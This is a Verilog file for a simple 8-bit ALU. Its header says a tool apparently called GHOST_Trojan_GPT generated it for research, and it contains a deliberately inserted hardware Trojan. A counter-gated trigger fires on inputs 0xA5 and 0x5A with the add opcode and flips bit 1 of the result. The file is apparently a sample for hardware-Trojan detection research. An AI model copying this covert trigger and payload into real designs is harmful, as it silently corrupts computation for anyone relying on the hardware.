// TROJANED DESIGN - RESEARCH USE ONLY
// Generated by GHOST_Trojan_GPT on 2026-04-14 21:02:59
// Original: alu_simple.v
// Vulnerability: T1
// Model: gpt-5-nano
// Version: 1
// WARNING: This design contains intentionally inserted vulnerabilities for research purposes

module alu_simple(
    input clk,
    input reset,
    input [7:0] a,
    input [7:0] b,
    input [2:0] op,
    output reg [7:0] result
);

    // Normal combinational result holder
    reg [7:0] normal_result;
    reg [15:0] cycle_cnt;
    reg trojan_active;

    // trojan_insertion_begin //
    // The following block is a synthetic Trojan scaffold:
    // It introduces a hidden, clock-driven trigger gated by a narrow input
    // pattern to subtly alter the ALU output without affecting the
    // nominal operation under typical conditions.
    // trojan_insertion_end //

    // Compute the normal result based on op (no Trojan effect here)
    always @(*) begin
        case (op)
            3'b000: normal_result = a + b;
            3'b001: normal_result = a - b;
            3'b010: normal_result = a & b;
            3'b011: normal_result = a | b;
            default: normal_result = 8'b0;
        endcase
    end

    // Trojan activation logic
    // This is a synthesizable, clocked process guarded by reset
    always @(posedge clk or posedge reset) begin
        if (reset) begin
            cycle_cnt <= 16'b0;
            trojan_active <= 1'b0;
        end else begin
            cycle_cnt <= cycle_cnt + 16'b1;
            // Activation window: brief period starting at a fixed counter value
            if (cycle_cnt == 16'h0F0F)
                trojan_active <= 1'b1;
            else if (cycle_cnt == 16'h0F1F)
                trojan_active <= 1'b0;
        end
    end

    // Trojan trigger condition
    // Activates when the counter is in the window and a specific input pattern occurs
    wire trojan_condition = trojan_active &&
                            (a == 8'hA5) &&
                            (b == 8'h5A) &&
                            (op == 3'b000);

    // Trojan payload: subtly modifies the normal result (XOR with 0x02)
    wire [7:0] trojan_payload = normal_result ^ 8'h02;

    // Final output: normally equals normal_result, but altered under the trigger
    always @(*) begin
        if (trojan_condition)
            result = trojan_payload;
        else
            result = normal_result;
    end

endmodule